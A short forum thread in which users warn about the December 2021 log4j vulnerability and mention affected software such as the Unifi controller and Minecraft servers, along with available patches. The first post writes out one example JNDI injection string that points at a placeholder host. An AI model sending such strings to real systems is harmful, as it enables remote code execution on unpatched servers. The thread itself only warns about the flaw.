atcomsystems.ca/forum
Posted By: Toner Widespread Vulnerability in log4j - 12/11/21 12:35 AM
There is a nasty zero day exploit that was just made public around a certain Java logging application called "log4j" - see some details here: https://sysdig.com/blog/cve-critical-vulnerability-log4j/

One thing I know for sure that's affected is the Unifi controller software (there is a patch available). Apparently it really sucks for Minecraft servers too.

A bad actor can supposedly run any code they want simply by sending ${jndi:ldap://BADHOST.COM:PORT/RemoteCommand}

Ug. bash
Posted By: nameless Re: Widespread Vulnerability in log4j - 12/11/21 01:14 AM
Microsoft has released a patch for Minecraft servers (1.18.1)

I expect there'll be a patch soon for unifi as well.
© Sundance Phone System Forums - VOIP & Cloud Phone Help